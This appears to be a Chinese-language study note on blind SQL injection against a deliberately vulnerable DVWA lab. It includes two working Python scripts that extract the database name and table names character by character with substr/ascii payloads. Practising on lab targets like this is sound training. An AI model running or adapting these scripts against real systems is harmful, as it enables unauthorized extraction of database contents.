目的
理解SQL盲注的原理、方法、過程。利用不同數據庫特有的函數進行探測,從而獲取信息。
環境
系統:Kali Linux 2019(IP:10.10.10.128)
平臺:OWASPBWA v0.94中的DVWA(IP:10.10.10.131)
界面
操作
現在想利用substr函數對數據庫名進行猜解,將字符轉化爲ACSII值逐位比較。
語法
substr(strings,offset,length)
- strings:必選項,數據庫中截取的字段
- offset:必選項,對strings的開始位置
- length:必選,要截取的長度
Python代碼
探查數據庫名
import requests
import re
header={
"Host":"10.10.10.131",
"User-Agent":"Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0",
"Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
"Accept-Language":"en-US,en;q=0.5",
"Accept-Encoding":"gzip, deflate",
"Cookie":"security=low; PHPSESSID=vr7sjjt900ulgougqr1asmb346; acopendivids=swingset,jotto,phpbb2,redmine; acgroupswithpersist=nada",
"Connection":"close",
"Upgrade-Insecure-Requests":"1",
"Cache-Control":"max-age=0"
}
def getDBName():
DBName = ""
url_template = "http://10.10.10.131/dvwa/vulnerabilities/sqli_blind/?id=1' and ascii(substr(database(),{0},1))={1} %23&Submit=Submit"
chars = '0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz'
print("Start to retrieve database name...")
for i in range(1,5):
for char in chars:
char_ascii=ord(char)
url = url_template.format(i,char_ascii)
response = requests.session().get(url,headers=header)
pattern = re.compile(r'Surname:')
match = pattern.search(response.text)
if match:
DBName += char
break
print("Retrieve complated\nDBName is: " + DBName)
getDBName()
導入正則表達式和url請求相關的模塊,由於注入的前提需要登陸,所以需要設置好URL的headers,response也應該是一個會話(session()),開始在網上查找時大多是requests.get(url),所以自己操作還是需要根據自己的實際來做適當的改動。尤其是URL在設置時要保證不能缺少相關字段,我在開始時就忘了“&Submit=Submit”字段,導致一直沒有結果。
探查表名
import requests
import re
header={
"Host":"10.10.10.131",
"User-Agent":"Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0",
"Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
"Accept-Language":"en-US,en;q=0.5",
"Accept-Encoding":"gzip, deflate",
"Cookie":"security=low; PHPSESSID=vr7sjjt900ulgougqr1asmb346; acopendivids=swingset,jotto,phpbb2,redmine; acgroupswithpersist=nada",
"Connection":"close",
"Upgrade-Insecure-Requests":"1",
"Cache-Control":"max-age=0"
}
def getTableName():
#DBName = ""
url_template = "http://10.10.10.131/dvwa/vulnerabilities/sqli_blind/?id=1' and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit {0},1),{1},1))={2} %23&Submit=Submit#"
chars = '0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz'
print("Start to retrieve table name...")
print("-------------------------------")
for i in range(0,2): # number of tables
TableName = ""
for j in range(1,10): # length of table_name
for char in chars:
char_ascii=ord(char)
url = url_template.format(i,j,char_ascii)
response = requests.session().get(url,headers=header)
pattern = re.compile(r'Surname:')
match = pattern.search(response.text)
if match:
TableName += char
break
if len(TableName) == 0:
print("Can' Find")
else:
print(TableName)
print("-------------------------------")
print("Finish retrieving!")
getTableName()
總結
整體過程比較簡單,但是實際操作中還不是那麼順利,總需要多實踐。
多做筆記,自我激勵!
Reference
https://blog.csdn.net/sophia9301/article/details/78215264
https://blog.csdn.net/MAILLIBIN/article/details/84592940